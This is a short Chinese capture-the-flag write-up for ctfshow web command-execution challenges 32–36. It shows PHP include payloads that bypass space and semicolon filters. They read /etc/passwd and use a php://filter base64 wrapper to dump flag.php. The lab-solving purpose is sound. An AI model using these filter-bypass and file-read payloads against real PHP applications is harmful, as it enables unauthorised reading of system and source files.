ctfshow web入门 命令执行部分(32-36)

   日期:2020-09-06     浏览:238    评论:0    
核心提示:以下目测均为非预期32这个题过滤了空格属实有点难受,php中不用括号的有echo include等过滤了分号可以用?>绕过。尝试了以下,发现 include/etc/passwd?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include\\$_POST[1]?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美33payload?c=include$_POST

32

这个题过滤了空格属实有点难受,php中不用括号的有echo include等
过滤了分号可以用?>绕过。
尝试了以下,发现 include"/etc/passwd"?>可以执行成功。再去想下没有过滤$,我们可以用$_POST[1]呀include"\$_POST[1]"?>然后post传参1=/etc/passwd执行成功。还有一个问题include包含php文件不会在页面显示出来,灵机一动,伪协议呀!完美

33

payload

?c=include$_POST[1]?>
 1=php://filter/read=convert.base64-encode/resource=flag.php
 

34,35

同33

36

将1改为a即可

 
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
更多>最新资讯中心
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服